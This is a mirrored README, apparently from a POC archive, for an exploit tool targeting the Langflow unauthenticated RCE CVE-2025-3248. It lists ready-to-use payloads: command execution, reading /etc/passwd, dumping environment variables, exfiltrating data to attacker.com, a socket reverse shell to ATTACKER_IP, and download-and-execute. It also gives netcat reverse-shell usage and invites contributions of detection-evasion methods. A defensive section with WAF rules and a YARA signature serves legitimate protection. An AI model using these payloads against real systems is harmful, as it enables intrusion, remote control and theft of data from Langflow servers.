关联漏洞
标题:Langflow 安全漏洞 (CVE-2025-3248)描述:Langflow是Langflow开源的一个用于构建多代理和 RAG 应用程序的可视化框架。 Langflow 1.3.0之前版本存在安全漏洞,该漏洞源于/api/v1/validate/code端点存在代码注入漏洞,可能导致远程未经验证的攻击者执行任意代码。
描述
A comprehensive Python exploitation framework for testing and demonstrating CVE-2025-3248, a critical unauthenticated remote code execution vulnerability in Langflow versions ≤ 1.3.0.
介绍
# CVE-2025-3248: Langflow Unauthenticated RCE Vulnerability Scanner
A comprehensive Python exploitation framework for testing and demonstrating **CVE-2025-3248**, a critical unauthenticated remote code execution vulnerability in Langflow versions ≤ 1.3.0.
---
## 🔴 Vulnerability Overview
### CVE-2025-3248: Langflow Code Injection RCE
| Property | Value |
|----------|-------|
| **CVE ID** | CVE-2025-3248 |
| **Product** | Langflow |
| **Affected Versions** | ≤ 1.3.0 |
| **Vulnerability Type** | Unauthenticated Remote Code Execution (RCE) |
| **Attack Vector** | Network |
| **Authentication Required** | None |
| **CVSS Score** | 9.8 (Critical) |
| **EPSS Score** | 92.57% |
| **CWE** | CWE-94 (Improper Control of Generation of Code) |
| **Vulnerable Endpoint** | `/api/v1/validate/code` |
### Root Cause
The vulnerability exists in the `/api/v1/validate/code` API endpoint, which accepts arbitrary Python code and validates it using Python's unsafe `exec()` function without proper input sanitization or sandboxing. The vulnerability exploits Python's behavior where:
1. **Decorators are evaluated immediately** during function definition
2. **Default argument values are executed** during Abstract Syntax Tree (AST) parsing
3. **No input validation** exists to prevent malicious code execution
### Attack Chain
```
Attacker → POST /api/v1/validate/code → Python exec() → RCE
↓
No Auth Required
↓
Arbitrary Python Code
↓
System Command Execution
```
---
## ✨ Features
- ✅ **Endpoint Detection**: Automatically identifies vulnerable Langflow instances
- ✅ **Multi-Stage Testing**: 4 progressive vulnerability tests
- ✅ **Command Execution**: Execute arbitrary system commands on target
- ✅ **Environment Extraction**: Retrieve environment variables and configuration
- ✅ **File Operations**: Test read/write file capabilities
- ✅ **Reverse Shell Support**: Spawn interactive reverse shell sessions
- ✅ **Version Detection**: Identify Langflow version information
- ✅ **Color-Coded Output**: Enhanced readability with terminal colors
- ✅ **Timeout Management**: Configurable request timeouts
- ✅ **SSL/TLS Bypass**: Support for self-signed certificates
---
## 📦 Requirements
```
Python >= 3.7
requests >= 2.25.0
```
### Install Dependencies
```bash
pip install requests
```
### Optional (for better logging)
```bash
pip install colorama # For Windows color support
```
---
## 🚀 Installation
### Method 1: Clone from GitHub
```bash
git clone https://github.com/drackyjr/cve-2025-3248-exploit.git
cd cve-2025-3248-exploit
pip install -r requirements.txt
chmod +x cve_2025_3248_test.py
```
---
## 📖 Usage
### Basic Syntax
```bash
python3 cve_2025_3248_test.py -t <target_url> [options]
```
### Quick Start Examples
#### 1. Basic Vulnerability Scan
```bash
python3 cve_2025_3248_test.py -t http://target.com
```
#### 2. Execute Custom Command
```bash
python3 cve_2025_3248_test.py -t http://target.com -c "whoami"
```
#### 3. Execute Multiple Commands
```bash
python3 cve_2025_3248_test.py -t http://target.com -c "cat /etc/passwd"
```
#### 4. Reverse Shell Exploitation (Authorized Testing Only)
**Step 1:** Start a netcat listener on your machine
```bash
nc -lvnp 4444
```
**Step 2:** Run the exploit
```bash
python3 cve_2025_3248_test.py -t http://target.com --exploit --lhost YOUR_IP --lport 4444
```
**Example:**
```bash
python3 cve_2025_3248_test.py -t http://192.168.1.100:7860 --exploit --lhost 192.168.1.50 --lport 4444
```
#### 5. Scan with Custom Timeout
```bash
python3 cve_2025_3248_test.py -t http://target.com --timeout 30
```
### Command-Line Arguments
```
positional arguments:
None
optional arguments:
-t, --target TARGET Target URL (e.g., http://target.com) [REQUIRED]
-c, --command COMMAND Command to execute (default: id)
--timeout TIMEOUT Request timeout in seconds (default: 10)
--exploit Enable exploitation mode (reverse shell)
--lhost LHOST Your IP address for reverse shell
--lport LPORT Your port for reverse shell
-h, --help Show this help message
```
---
## 💾 Payload Variations
### 1. Decorator-Based Execution
```python
payload = {
"code": """
@exec("import os; os.system('whoami')")
def vulnerable_function():
pass
"""
}
```
### 2. Default Argument Execution
```python
payload = {
"code": """
def test(arg=exec("__import__('subprocess').check_output(['id'])")):
pass
"""
}
```
### 3. Data Exfiltration
```python
payload = {
"code": """
def test(x=exec("import requests; requests.post('http://attacker.com/exfil', data=open('/etc/passwd').read())")):
pass
"""
}
```
### 4. Reverse Shell (One-Liner)
```python
payload = {
"code": """
def shell(x=exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/sh','-i'])")):
pass
"""
}
```
### 5. File Read Operations
```python
payload = {
"code": """
def read_file(x=exec("print(open('/etc/passwd').read())")):
pass
"""
}
```
### 6. Environment Variable Enumeration
```python
payload = {
"code": """
def enum_env(x=exec("import os; print('\\n'.join([f'{k}={v}' for k,v in os.environ.items()]))")):
pass
"""
}
```
### 7. Download and Execute
```python
payload = {
"code": """
def download_exec(x=exec("import urllib.request; exec(urllib.request.urlopen('http://attacker.com/payload.py').read())")):
pass
"""
}
```
---
## 🔍 Detection & Mitigation
### For Defenders
#### Immediate Actions
1. **Upgrade Langflow**
```bash
pip install langflow>=1.3.0
# or
docker pull langflow:latest
```
2. **Restrict Network Access**
```bash
# Nginx reverse proxy - block vulnerable endpoint
location /api/v1/validate/code {
deny all;
}
```
3. **Implement Authentication**
```python
# Add authentication middleware
@app.middleware("http")
async def auth_middleware(request, call_next):
if "/api/v1/validate/code" in request.url.path:
if not verify_auth(request):
return JSONResponse(status_code=401)
return await call_next(request)
```
#### WAF Rules
**ModSecurity Rule:**
```
SecRule ARGS:code "@contains exec" "id:1001,phase:2,deny"
SecRule ARGS:code "@contains subprocess" "id:1002,phase:2,deny"
SecRule ARGS:code "@contains __import__" "id:1003,phase:2,deny"
SecRule ARGS:code "@contains os.system" "id:1004,phase:2,deny"
```
#### Detection Rules
**YARA Signature:**
```yara
rule CVE_2025_3248_Langflow_RCE {
strings:
$api_path = "/api/v1/validate/code"
$exec = "exec("
$subprocess = "subprocess"
$os_system = "os.system"
condition:
$api_path and any of ($exec, $subprocess, $os_system)
}
```
#### Monitoring & Logging
```bash
# Monitor for suspicious requests
tail -f /var/log/nginx/access.log | grep "/api/v1/validate/code"
# Alert on POST requests to vulnerable endpoint
auditctl -w /var/lib/langflow -p wa -k langflow_changes
```
### Indicators of Compromise (IoCs)
- Unusual POST requests to `/api/v1/validate/code`
- Spawned processes from Langflow with suspicious names
- Unexpected outbound connections from Langflow server
- Files created with unusual timestamps in `/tmp`
- Python subprocess execution from Langflow process
- Authentication failures followed by API requests
- Spike in CPU/Memory usage from Langflow container
---
## 🔬 Technical Analysis
### How the Vulnerability Works
The vulnerability chain works as follows:
```python
# Attacker sends this payload:
POST /api/v1/validate/code HTTP/1.1
Content-Type: application/json
{
"code": "def func(x=exec('import os; os.system(\"whoami\")')): pass"
}
# Server processes it:
exec(code) # ← Dangerous! No sanitization
# During AST parsing, the default argument is evaluated:
# exec('import os; os.system("whoami")')
# Result: Arbitrary command execution
```
### Why Decorators Work
Python's behavior with decorators during function definition:
```python
# This code gets executed immediately:
@decorator_expression
def my_function():
pass
# Which means this payload executes the code:
@exec("malicious_code_here")
def vulnerable_function():
pass
```
### Why It's Critical
1. **No Authentication Required**: Anyone can access the endpoint
2. **Network Accessible**: Can be exploited remotely
3. **Full System Access**: Executes with Langflow process privileges
4. **No Input Validation**: Direct code execution
5. **Widely Deployed**: Used in production environments
6. **High Exploit Availability**: Public POCs available
---
## 📊 Vulnerability Timeline
| Date | Event |
|------|-------|
| 2025-04-06 | Vulnerability discovered and reported to Langflow team |
| 2025-04-17 | Public exploit released (Exploit-DB) |
| 2025-05-14 | FortiguardLabs Outbreak Alert issued |
| 2025-05-21 | Zscaler ThreatLabz analysis published |
| 2025-05-22 | RecordedFuture reports active exploitation |
| 2025-06-16 | TrendMicro reports FLODRIC botnet exploitation |
| 2025-06-17 | OffSec comprehensive analysis published |
| 2025-11-05 | SentinelOne vulnerability database entry |
| 2025-11-20 | Continued exploitation attempts observed |
---
## 🛡️ Defensive Testing Checklist
When performing authorized security testing:
- [ ] Obtain written authorization before testing
- [ ] Document all test activities
- [ ] Use isolated test environments when possible
- [ ] Avoid exploiting production systems unnecessarily
- [ ] Clean up any artifacts (files, processes) created during testing
- [ ] Report findings responsibly to the target organization
- [ ] Follow responsible disclosure practices
- [ ] Maintain confidentiality of test results
---
## 📚 References
- **OffSec Blog**: [CVE-2025-3248 Analysis](https://www.offsec.com/blog/cve-2025-3248/)
- **SentinelOne**: [Langflow Code Injection RCE](https://www.sentinelone.com/vulnerability-database/cve-2025-3248/)
- **Zscaler ThreatLabz**: [CVE-2025-3248 RCE Vulnerability](https://www.zscaler.com/blogs/security-research/cve-2025-3248-rce-vulnerability-langflow)
- **TrendMicro**: [FLODRIC Botnet Exploitation](https://www.trendmicro.com/en/research/25/f/langflow-vulnerability-flodric-botnet.html)
- **RecordedFuture**: [Active Exploitation Report](https://www.recordedfuture.com/blog/langflow-cve-2025-3248)
- **Exploit-DB**: [Langflow 1.3.0 RCE](https://www.exploit-db.com/exploits/52262)
- **GitHub Advisories**: [GHSA-c995-4fw3-j39m](https://github.com/advisories/GHSA-c995-4fw3-j39m)
---
---
## 🤝 Contributing
Contributions are welcome! Please follow these guidelines:
1. Fork the repository
2. Create a feature branch (`git checkout -b feature/amazing-feature`)
3. Commit your changes (`git commit -m 'Add amazing feature'`)
4. Push to the branch (`git push origin feature/amazing-feature`)
5. Open a Pull Request
### Contribution Ideas
- Additional payload variations
- Alternative exploitation techniques
- Detection evasion methods
- Mitigation strategies
- Documentation improvements
- Bug fixes
---
---
## ⚠️ Disclaimer
**IMPORTANT LEGAL NOTICE:**
This tool is provided **for educational and authorized security testing purposes only**. Unauthorized access to computer systems is **ILLEGAL** and violates laws including:
- **Computer Fraud and Abuse Act (CFAA)** - USA
- **Computer Misuse Act** - UK
- **Information Technology Act (ITA)** - India
- **Similar laws in your jurisdiction**
### You are solely responsible for:
- ✅ Obtaining explicit written authorization from system owners before testing
- ✅ Ensuring all activities comply with local and international laws
- ✅ Using this tool only on systems you own or have permission to test
- ✅ Maintaining the confidentiality of security findings
- ✅ Following responsible disclosure practices
- ✅ Not using this tool for malicious purposes
### By using this tool, you agree to:
- Not use it for unauthorized access or damage
- Accept full legal responsibility for your actions
- Indemnify and hold harmless the creators from any liability
- Comply with all applicable laws and regulations
**The creators and contributors assume NO LIABILITY for misuse of this tool.**
## 📖 Additional Resources
### Learning Materials
- [OWASP Code Injection](https://owasp.org/www-community/attacks/Code_Injection)
- [CWE-94: Improper Control of Generation of Code](https://cwe.mitre.org/data/definitions/94.html)
- [Python Security: exec() Dangers](https://docs.python.org/3/library/functions.html#exec)
- [Reverse Shell Techniques](https://www.revshells.com/)
---
**Last Updated**: November 21, 2025
---
```
╔═══════════════════════════════════════════════════════════╗
║ CVE-2025-3248: Langflow RCE Vulnerability Scanner v1.0 ║
║ Use Responsibly - Authorized Testing Only ║
╚═══════════════════════════════════════════════════════════╝
```
文件快照
[4.0K] /data/pocs/a6b68dc213dc6d149fc59e69d7fc5be691467598
├── [ 12K] cve_2025_3248_test.py
└── [ 13K] README.md
1 directory, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。